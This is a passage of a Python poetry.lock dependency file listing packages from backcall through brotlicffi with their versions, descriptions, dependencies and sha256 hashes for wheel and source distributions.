"sha256:fbbce6a29f263178a1f7915c1940bde0ec2b2a967566fe1c65c1dfb7422bd255"}, {file = "backcall-0.2.0.tar.gz", hash = "sha256:5cbdbf27be5e7cfadb448baf0aa95508f91f2bbc6c6437cd9cd06e2a4c215e1e"}, ] [[package]] name = "backoff" version = "2.2.1" description = "Function decoration for backoff and retry" optional = true python-versions = ">=3.7,<4.0" files = [ {file = "backoff-2.2.1-py3-none-any.whl", hash = "sha256:63579f9a0628e06278f7e47b7d7d5b6ce20dc65c5e96a6f3ca99a6adca0396e8"}, {file = "backoff-2.2.1.tar.gz", hash = "sha256:03f829f5bb1923180821643f8753b0502c3b682293992485b0eef2807afa5cba"}, ] [[package]] name = "backports-zoneinfo" version = "0.2.1" description = "Backport of the standard library zoneinfo module" optional = true python-versions = ">=3.6" files = [ {file = "backports.zoneinfo-0.2.1-cp36-cp36m-macosx_10_14_x86_64.whl", hash = "sha256:da6013fd84a690242c310d77ddb8441a559e9cb3d3d59ebac9aca1a57b2e18bc"}, {file = "backports.zoneinfo-0.2.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:89a48c0d158a3cc3f654da4c2de1ceba85263fafb861b98b59040a5086259722"}, {file = "backports.zoneinfo-0.2.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:1c5742112073a563c81f786e77514969acb58649bcdf6cdf0b4ed31a348d4546"}, {file = "backports.zoneinfo-0.2.1-cp36-cp36m-win32.whl", hash = "sha256:e8236383a20872c0cdf5a62b554b27538db7fa1bbec52429d8d106effbaeca08"}, {file = "backports.zoneinfo-0.2.1-cp36-cp36m-win_amd64.whl", hash = "sha256:8439c030a11780786a2002261569bdf362264f605dfa4d65090b64b05c9f79a7"}, {file = "backports.zoneinfo-0.2.1-cp37-cp37m-macosx_10_14_x86_64.whl", hash = "sha256:f04e857b59d9d1ccc39ce2da1021d196e47234873820cbeaad210724b1ee28ac"}, {file = "backports.zoneinfo-0.2.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:17746bd546106fa389c51dbea67c8b7c8f0d14b5526a579ca6ccf5ed72c526cf"}, {file = "backports.zoneinfo-0.2.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:5c144945a7752ca544b4b78c8c41544cdfaf9786f25fe5ffb10e838e19a27570"}, {file = "backports.zoneinfo-0.2.1-cp37-cp37m-win32.whl", hash = "sha256:e55b384612d93be96506932a786bbcde5a2db7a9e6a4bb4bffe8b733f5b9036b"}, {file = "backports.zoneinfo-0.2.1-cp37-cp37m-win_amd64.whl", hash = "sha256:a76b38c52400b762e48131494ba26be363491ac4f9a04c1b7e92483d169f6582"}, {file = "backports.zoneinfo-0.2.1-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:8961c0f32cd0336fb8e8ead11a1f8cd99ec07145ec2931122faaac1c8f7fd987"}, {file = "backports.zoneinfo-0.2.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:e81b76cace8eda1fca50e345242ba977f9be6ae3945af8d46326d776b4cf78d1"}, {file = "backports.zoneinfo-0.2.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:7b0a64cda4145548fed9efc10322770f929b944ce5cee6c0dfe0c87bf4c0c8c9"}, {file = "backports.zoneinfo-0.2.1-cp38-cp38-win32.whl", hash = "sha256:1b13e654a55cd45672cb54ed12148cd33628f672548f373963b0bff67b217328"}, {file = "backports.zoneinfo-0.2.1-cp38-cp38-win_amd64.whl", hash = "sha256:4a0f800587060bf8880f954dbef70de6c11bbe59c673c3d818921f042f9954a6"}, {file = "backports.zoneinfo-0.2.1.tar.gz", hash = "sha256:fadbfe37f74051d024037f223b8e001611eac868b5c5b06144ef4d8b799862f2"}, ] [package.extras] tzdata = ["tzdata"] [[package]] name = "beautifulsoup4" version = "4.12.2" description = "Screen-scraping library" optional = false python-versions = ">=3.6.0" files = [ {file = "beautifulsoup4-4.12.2-py3-none-any.whl", hash = "sha256:bd2520ca0d9d7d12694a53d44ac482d181b4ec1888909b035a3dbf40d0f57d4a"}, {file = "beautifulsoup4-4.12.2.tar.gz", hash = "sha256:492bbc69dca35d12daac71c4db1bfff0c876c00ef4a2ffacce226d4638eb72da"}, ] [package.dependencies] soupsieve = ">1.2" [package.extras] html5lib = ["html5lib"] lxml = ["lxml"] [[package]] name = "bibtexparser" version = "1.4.1" description = "Bibtex parser for python 3" optional = true python-versions = "*" files = [ {file = "bibtexparser-1.4.1.tar.gz", hash = "sha256:e00e29e24676c4808e0b4333b37bb55cca9cbb7871a56f63058509281588d789"}, ] [package.dependencies] pyparsing = ">=2.0.3" [[package]] name = "black" version = "23.10.1" description = "The uncompromising code formatter." optional = false python-versions = ">=3.8" files = [ {file = "black-23.10.1-cp310-cp310-macosx_10_16_arm64.whl", hash = "sha256:ec3f8e6234c4e46ff9e16d9ae96f4ef69fa328bb4ad08198c8cee45bb1f08c69"}, {file = "black-23.10.1-cp310-cp310-macosx_10_16_x86_64.whl", hash = "sha256:1b917a2aa020ca600483a7b340c165970b26e9029067f019e3755b56e8dd5916"}, {file = "black-23.10.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9c74de4c77b849e6359c6f01987e94873c707098322b91490d24296f66d067dc"}, {file = "black-23.10.1-cp310-cp310-win_amd64.whl", hash = "sha256:7b4d10b0f016616a0d93d24a448100adf1699712fb7a4efd0e2c32bbb219b173"}, {file = "black-23.10.1-cp311-cp311-macosx_10_16_arm64.whl", hash = "sha256:b15b75fc53a2fbcac8a87d3e20f69874d161beef13954747e053bca7a1ce53a0"}, {file = "black-23.10.1-cp311-cp311-macosx_10_16_x86_64.whl", hash = "sha256:e293e4c2f4a992b980032bbd62df07c1bcff82d6964d6c9496f2cd726e246ace"}, {file = "black-23.10.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7d56124b7a61d092cb52cce34182a5280e160e6aff3137172a68c2c2c4b76bcb"}, {file = "black-23.10.1-cp311-cp311-win_amd64.whl", hash = "sha256:3f157a8945a7b2d424da3335f7ace89c14a3b0625e6593d21139c2d8214d55ce"}, {file = "black-23.10.1-cp38-cp38-macosx_10_16_arm64.whl", hash = "sha256:cfcce6f0a384d0da692119f2d72d79ed07c7159879d0bb1bb32d2e443382bf3a"}, {file = "black-23.10.1-cp38-cp38-macosx_10_16_x86_64.whl", hash = "sha256:33d40f5b06be80c1bbce17b173cda17994fbad096ce60eb22054da021bf933d1"}, {file = "black-23.10.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:840015166dbdfbc47992871325799fd2dc0dcf9395e401ada6d88fe11498abad"}, {file = "black-23.10.1-cp38-cp38-win_amd64.whl", hash = "sha256:037e9b4664cafda5f025a1728c50a9e9aedb99a759c89f760bd83730e76ba884"}, {file = "black-23.10.1-cp39-cp39-macosx_10_16_arm64.whl", hash = "sha256:7cb5936e686e782fddb1c73f8aa6f459e1ad38a6a7b0e54b403f1f05a1507ee9"}, {file = "black-23.10.1-cp39-cp39-macosx_10_16_x86_64.whl", hash = "sha256:7670242e90dc129c539e9ca17665e39a146a761e681805c54fbd86015c7c84f7"}, {file = "black-23.10.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5ed45ac9a613fb52dad3b61c8dea2ec9510bf3108d4db88422bacc7d1ba1243d"}, {file = "black-23.10.1-cp39-cp39-win_amd64.whl", hash = "sha256:6d23d7822140e3fef190734216cefb262521789367fbdc0b3f22af6744058982"}, {file = "black-23.10.1-py3-none-any.whl", hash = "sha256:d431e6739f727bb2e0495df64a6c7a5310758e87505f5f8cde9ff6c0f2d7e4fe"}, {file = "black-23.10.1.tar.gz", hash = "sha256:1f8ce316753428ff68749c65a5f7844631aa18c8679dfd3ca9dc1a289979c258"}, ] [package.dependencies] click = ">=8.0.0" mypy-extensions = ">=0.4.3" packaging = ">=22.0" pathspec = ">=0.9.0" platformdirs = ">=2" tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""} typing-extensions = {version = ">=4.0.1", markers = "python_version < \"3.11\""} [package.extras] colorama = ["colorama (>=0.4.3)"] d = ["aiohttp (>=3.7.4)"] jupyter = ["ipython (>=7.8.0)", "tokenize-rt (>=3.2.0)"] uvloop = ["uvloop (>=0.15.2)"] [[package]] name = "bleach" version = "6.1.0" description = "An easy safelist-based HTML-sanitizing tool." optional = false python-versions = ">=3.8" files = [ {file = "bleach-6.1.0-py3-none-any.whl", hash = "sha256:3225f354cfc436b9789c66c4ee030194bee0568fbf9cbdad3bc8b5c26c5f12b6"}, {file = "bleach-6.1.0.tar.gz", hash = "sha256:0a31f1837963c41d46bbf1331b8778e1308ea0791db03cc4e7357b97cf42a8fe"}, ] [package.dependencies] six = ">=1.9.0" webencodings = "*" [package.extras] css = ["tinycss2 (>=1.1.0,<1.3)"] [[package]] name = "blinker" version = "1.6.3" description = "Fast, simple object-to-object and broadcast signaling" optional = true python-versions = ">=3.7" files = [ {file = "blinker-1.6.3-py3-none-any.whl", hash = "sha256:296320d6c28b006eb5e32d4712202dbcdcbf5dc482da298c2f44881c43884aaa"}, {file = "blinker-1.6.3.tar.gz", hash = "sha256:152090d27c1c5c722ee7e48504b02d76502811ce02e1523553b4cf8c8b3d3a8d"}, ] [[package]] name = "boto3" version = "1.28.64" description = "The AWS SDK for Python" optional = true python-versions = ">= 3.7" files = [ {file = "boto3-1.28.64-py3-none-any.whl", hash = "sha256:a99150a30c038c73e89662836820a8cce914afab5ea377942a37c484b85f4438"}, {file = "boto3-1.28.64.tar.gz", hash = "sha256:a5cf93b202568e9d378afdc84be55a6dedf11d30156289fe829e23e6d7dccabb"}, ] [package.dependencies] botocore = ">=1.31.64,<1.32.0" jmespath = ">=0.7.1,<2.0.0" s3transfer = ">=0.7.0,<0.8.0" [package.extras] crt = ["botocore[crt] (>=1.21.0,<2.0a0)"] [[package]] name = "botocore" version = "1.31.64" description = "Low-level, data-driven core of boto 3." optional = true python-versions = ">= 3.7" files = [ {file = "botocore-1.31.64-py3-none-any.whl", hash = "sha256:7b709310343a5b430ec9025b2e17c0bac6b16c05f1ac1d9521dece3f10c71bac"}, {file = "botocore-1.31.64.tar.gz", hash = "sha256:d8eb4b724ac437343359b318d73de0cfae0fecb24095827e56135b0ad6b44caf"}, ] [package.dependencies] jmespath = ">=0.7.1,<2.0.0" python-dateutil = ">=2.1,<3.0.0" urllib3 = [ {version = ">=1.25.4,<2.1", markers = "python_version >= \"3.10\""}, {version = ">=1.25.4,<1.27", markers = "python_version < \"3.10\""}, ] [package.extras] crt = ["awscrt (==0.16.26)"] [[package]] name = "brotli" version = "1.1.0" description = "Python bindings for the Brotli compression library" optional = true python-versions = "*" files = [ {file = "Brotli-1.1.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:e1140c64812cb9b06c922e77f1c26a75ec5e3f0fb2bf92cc8c58720dec276752"}, {file = "Brotli-1.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c8fd5270e906eef71d4a8d19b7c6a43760c6abcfcc10c9101d14eb2357418de9"}, {file = "Brotli-1.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1ae56aca0402a0f9a3431cddda62ad71666ca9d4dc3a10a142b9dce2e3c0cda3"}, {file = "Brotli-1.1.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:43ce1b9935bfa1ede40028054d7f48b5469cd02733a365eec8a329ffd342915d"}, {file = "Brotli-1.1.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:7c4855522edb2e6ae7fdb58e07c3ba9111e7621a8956f481c68d5d979c93032e"}, {file = "Brotli-1.1.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:38025d9f30cf4634f8309c6874ef871b841eb3c347e90b0851f63d1ded5212da"}, {file = "Brotli-1.1.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:e6a904cb26bfefc2f0a6f240bdf5233be78cd2488900a2f846f3c3ac8489ab80"}, {file = "Brotli-1.1.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:a37b8f0391212d29b3a91a799c8e4a2855e0576911cdfb2515487e30e322253d"}, {file = "Brotli-1.1.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:e84799f09591700a4154154cab9787452925578841a94321d5ee8fb9a9a328f0"}, {file = "Brotli-1.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:f66b5337fa213f1da0d9000bc8dc0cb5b896b726eefd9c6046f699b169c41b9e"}, {file = "Brotli-1.1.0-cp310-cp310-win32.whl", hash = "sha256:be36e3d172dc816333f33520154d708a2657ea63762ec16b62ece02ab5e4daf2"}, {file = "Brotli-1.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:0c6244521dda65ea562d5a69b9a26120769b7a9fb3db2fe9545935ed6735b128"}, {file = "Brotli-1.1.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:a3daabb76a78f829cafc365531c972016e4aa8d5b4bf60660ad8ecee19df7ccc"}, {file = "Brotli-1.1.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:c8146669223164fc87a7e3de9f81e9423c67a79d6b3447994dfb9c95da16e2d6"}, {file = "Brotli-1.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:30924eb4c57903d5a7526b08ef4a584acc22ab1ffa085faceb521521d2de32dd"}, {file = "Brotli-1.1.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ceb64bbc6eac5a140ca649003756940f8d6a7c444a68af170b3187623b43bebf"}, {file = "Brotli-1.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a469274ad18dc0e4d316eefa616d1d0c2ff9da369af19fa6f3daa4f09671fd61"}, {file = "Brotli-1.1.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:524f35912131cc2cabb00edfd8d573b07f2d9f21fa824bd3fb19725a9cf06327"}, {file = "Brotli-1.1.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:5b3cc074004d968722f51e550b41a27be656ec48f8afaeeb45ebf65b561481dd"}, {file = "Brotli-1.1.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:19c116e796420b0cee3da1ccec3b764ed2952ccfcc298b55a10e5610ad7885f9"}, {file = "Brotli-1.1.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:510b5b1bfbe20e1a7b3baf5fed9e9451873559a976c1a78eebaa3b86c57b4265"}, {file = "Brotli-1.1.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:a1fd8a29719ccce974d523580987b7f8229aeace506952fa9ce1d53a033873c8"}, {file = "Brotli-1.1.0-cp311-cp311-win32.whl", hash = "sha256:39da8adedf6942d76dc3e46653e52df937a3c4d6d18fdc94a7c29d263b1f5b50"}, {file = "Brotli-1.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:aac0411d20e345dc0920bdec5548e438e999ff68d77564d5e9463a7ca9d3e7b1"}, {file = "Brotli-1.1.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:316cc9b17edf613ac76b1f1f305d2a748f1b976b033b049a6ecdfd5612c70409"}, {file = "Brotli-1.1.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:caf9ee9a5775f3111642d33b86237b05808dafcd6268faa492250e9b78046eb2"}, {file = "Brotli-1.1.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:70051525001750221daa10907c77830bc889cb6d865cc0b813d9db7fefc21451"}, {file = "Brotli-1.1.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:7f4bf76817c14aa98cc6697ac02f3972cb8c3da93e9ef16b9c66573a68014f91"}, {file = "Brotli-1.1.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d0c5516f0aed654134a2fc936325cc2e642f8a0e096d075209672eb321cff408"}, {file = "Brotli-1.1.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6c3020404e0b5eefd7c9485ccf8393cfb75ec38ce75586e046573c9dc29967a0"}, {file = "Brotli-1.1.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:4ed11165dd45ce798d99a136808a794a748d5dc38511303239d4e2363c0695dc"}, {file = "Brotli-1.1.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:4093c631e96fdd49e0377a9c167bfd75b6d0bad2ace734c6eb20b348bc3ea180"}, {file = "Brotli-1.1.0-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:7e4c4629ddad63006efa0ef968c8e4751c5868ff0b1c5c40f76524e894c50248"}, {file = "Brotli-1.1.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:861bf317735688269936f755fa136a99d1ed526883859f86e41a5d43c61d8966"}, {file = "Brotli-1.1.0-cp312-cp312-win32.whl", hash = "sha256:5f4d5ea15c9382135076d2fb28dde923352fe02951e66935a9efaac8f10e81b0"}, {file = "Brotli-1.1.0-cp312-cp312-win_amd64.whl", hash = "sha256:906bc3a79de8c4ae5b86d3d75a8b77e44404b0f4261714306e3ad248d8ab0951"}, {file = "Brotli-1.1.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:a090ca607cbb6a34b0391776f0cb48062081f5f60ddcce5d11838e67a01928d1"}, {file = "Brotli-1.1.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2de9d02f5bda03d27ede52e8cfe7b865b066fa49258cbab568720aa5be80a47d"}, {file = "Brotli-1.1.0-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2333e30a5e00fe0fe55903c8832e08ee9c3b1382aacf4db26664a16528d51b4b"}, {file = "Brotli-1.1.0-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:4d4a848d1837973bf0f4b5e54e3bec977d99be36a7895c61abb659301b02c112"}, {file = "Brotli-1.1.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:fdc3ff3bfccdc6b9cc7c342c03aa2400683f0cb891d46e94b64a197910dc4064"}, {file = "Brotli-1.1.0-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:5eeb539606f18a0b232d4ba45adccde4125592f3f636a6182b4a8a436548b914"}, {file = "Brotli-1.1.0-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:fd5f17ff8f14003595ab414e45fce13d073e0762394f957182e69035c9f3d7c2"}, {file = "Brotli-1.1.0-cp36-cp36m-musllinux_1_1_ppc64le.whl", hash = "sha256:069a121ac97412d1fe506da790b3e69f52254b9df4eb665cd42460c837193354"}, {file = "Brotli-1.1.0-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:e93dfc1a1165e385cc8239fab7c036fb2cd8093728cbd85097b284d7b99249a2"}, {file = "Brotli-1.1.0-cp36-cp36m-win32.whl", hash = "sha256:a599669fd7c47233438a56936988a2478685e74854088ef5293802123b5b2460"}, {file = "Brotli-1.1.0-cp36-cp36m-win_amd64.whl", hash = "sha256:d143fd47fad1db3d7c27a1b1d66162e855b5d50a89666af46e1679c496e8e579"}, {file = "Brotli-1.1.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:11d00ed0a83fa22d29bc6b64ef636c4552ebafcef57154b4ddd132f5638fbd1c"}, {file = "Brotli-1.1.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f733d788519c7e3e71f0855c96618720f5d3d60c3cb829d8bbb722dddce37985"}, {file = "Brotli-1.1.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:929811df5462e182b13920da56c6e0284af407d1de637d8e536c5cd00a7daf60"}, {file = "Brotli-1.1.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:0b63b949ff929fbc2d6d3ce0e924c9b93c9785d877a21a1b678877ffbbc4423a"}, {file = "Brotli-1.1.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:d192f0f30804e55db0d0e0a35d83a9fead0e9a359a9ed0285dbacea60cc10a84"}, {file = "Brotli-1.1.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:f296c40e23065d0d6650c4aefe7470d2a25fffda489bcc3eb66083f3ac9f6643"}, {file = "Brotli-1.1.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:919e32f147ae93a09fe064d77d5ebf4e35502a8df75c29fb05788528e330fe74"}, {file = "Brotli-1.1.0-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:23032ae55523cc7bccb4f6a0bf368cd25ad9bcdcc1990b64a647e7bbcce9cb5b"}, {file = "Brotli-1.1.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:224e57f6eac61cc449f498cc5f0e1725ba2071a3d4f48d5d9dffba42db196438"}, {file = "Brotli-1.1.0-cp37-cp37m-win32.whl", hash = "sha256:587ca6d3cef6e4e868102672d3bd9dc9698c309ba56d41c2b9c85bbb903cdb95"}, {file = "Brotli-1.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:2954c1c23f81c2eaf0b0717d9380bd348578a94161a65b3a2afc62c86467dd68"}, {file = "Brotli-1.1.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:efa8b278894b14d6da122a72fefcebc28445f2d3f880ac59d46c90f4c13be9a3"}, {file = "Brotli-1.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:03d20af184290887bdea3f0f78c4f737d126c74dc2f3ccadf07e54ceca3bf208"}, {file = "Brotli-1.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6172447e1b368dcbc458925e5ddaf9113477b0ed542df258d84fa28fc45ceea7"}, {file = "Brotli-1.1.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a743e5a28af5f70f9c080380a5f908d4d21d40e8f0e0c8901604d15cfa9ba751"}, {file = "Brotli-1.1.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:0541e747cce78e24ea12d69176f6a7ddb690e62c425e01d31cc065e69ce55b48"}, {file = "Brotli-1.1.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:cdbc1fc1bc0bff1cef838eafe581b55bfbffaed4ed0318b724d0b71d4d377619"}, {file = "Brotli-1.1.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:890b5a14ce214389b2cc36ce82f3093f96f4cc730c1cffdbefff77a7c71f2a97"}, {file = "Brotli-1.1.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:1ab4fbee0b2d9098c74f3057b2bc055a8bd92ccf02f65944a241b4349229185a"}, {file = "Brotli-1.1.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:141bd4d93984070e097521ed07e2575b46f817d08f9fa42b16b9b5f27b5ac088"}, {file = "Brotli-1.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:fce1473f3ccc4187f75b4690cfc922628aed4d3dd013d047f95a9b3919a86596"}, {file = "Brotli-1.1.0-cp38-cp38-win32.whl", hash = "sha256:db85ecf4e609a48f4b29055f1e144231b90edc90af7481aa731ba2d059226b1b"}, {file = "Brotli-1.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:3d7954194c36e304e1523f55d7042c59dc53ec20dd4e9ea9d151f1b62b4415c0"}, {file = "Brotli-1.1.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:5fb2ce4b8045c78ebbc7b8f3c15062e435d47e7393cc57c25115cfd49883747a"}, {file = "Brotli-1.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:7905193081db9bfa73b1219140b3d315831cbff0d8941f22da695832f0dd188f"}, {file = "Brotli-1.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a77def80806c421b4b0af06f45d65a136e7ac0bdca3c09d9e2ea4e515367c7e9"}, {file = "Brotli-1.1.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:8dadd1314583ec0bf2d1379f7008ad627cd6336625d6679cf2f8e67081b83acf"}, {file = "Brotli-1.1.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:901032ff242d479a0efa956d853d16875d42157f98951c0230f69e69f9c09bac"}, {file = "Brotli-1.1.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:22fc2a8549ffe699bfba2256ab2ed0421a7b8fadff114a3d201794e45a9ff578"}, {file = "Brotli-1.1.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ae15b066e5ad21366600ebec29a7ccbc86812ed267e4b28e860b8ca16a2bc474"}, {file = "Brotli-1.1.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:949f3b7c29912693cee0afcf09acd6ebc04c57af949d9bf77d6101ebb61e388c"}, {file = "Brotli-1.1.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:89f4988c7203739d48c6f806f1e87a1d96e0806d44f0fba61dba81392c9e474d"}, {file = "Brotli-1.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:de6551e370ef19f8de1807d0a9aa2cdfdce2e85ce88b122fe9f6b2b076837e59"}, {file = "Brotli-1.1.0-cp39-cp39-win32.whl", hash = "sha256:f0d8a7a6b5983c2496e364b969f0e526647a06b075d034f3297dc66f3b360c64"}, {file = "Brotli-1.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:cdad5b9014d83ca68c25d2e9444e28e967ef16e80f6b436918c700c117a85467"}, {file = "Brotli-1.1.0.tar.gz", hash = "sha256:81de08ac11bcb85841e440c13611c00b67d3bf82698314928d0b676362546724"}, ] [[package]] name = "brotlicffi" version = "1.1.0.0" description = "Python CFFI bindings to the Brotli library" optional = true python-versions = ">=3.7" files = [ {file = "brotlicffi-1.1.0.0-cp37-abi3-macosx_10_9_x86_64.whl", hash = "sha256:9b7ae6bd1a3f0df532b6d67ff674099a96d22bc0948955cb338488c31bfb8851"}, {file = "brotlicffi-1.1.0.0-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:19ffc919fa4fc6ace69286e0a23b3789b4219058313cf9b45625016bf7ff996b"}, {file = "brotlicffi-1.1.0.0-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9feb210d932ffe7798ee62e6145d3a757eb6233aa9a4e7db78dd3690d7755814"}, {file = "brotlicffi-1.1.0.0-cp37-abi3-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:84763dbdef5dd5c24b75597a77e1b30c66604725707565188ba54bab4f114820"}, {file = "brotlicffi-1.1.0.0-cp37-abi3-win32.whl", hash = "sha256:1b12b50e07c3911e1efa3a8971543e7648100713d4e0971b13631cce22c587eb"}, {file = "brotlicffi-1.1.0.0-cp37-abi3-win_amd64.whl", hash = "sha256:994a4f0681bb6c6c3b0925530a1926b7a189d878e6e5e38fae8efa47c5d9c613"}, {file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:2e4aeb0bd2540cb91b069dbdd54d458da8c4334ceaf2d25df2f4af576d6766ca"}, {file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4b7b0033b0d37bb33009fb2fef73310e432e76f688af76c156b3594389d81391"}, {file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:54a07bb2374a1eba8ebb52b6fafffa2afd3c4df85ddd38fcc0511f2bb387c2a8"}, {file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7901a7dc4b88f1c1475de59ae9be59799db1007b7d059817948d8e4f12e24e35"}, {file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:ce01c7316aebc7fce59da734286148b1d1b9455f89cf2c8a4dfce7d41db55c2d"}, {file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:246f1d1a90279bb6069de3de8d75a8856e073b8ff0b09dcca18ccc14cec85979"}, {file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cc4bc5d82bc56ebd8b514fb8350cfac4627d6b0743382e46d033976a5f80fab6"}, {file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:37c26ecb14386a44b118ce36e546ce307f4810bc9598a6e6cb4f7fca725ae7e6"}, {file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", 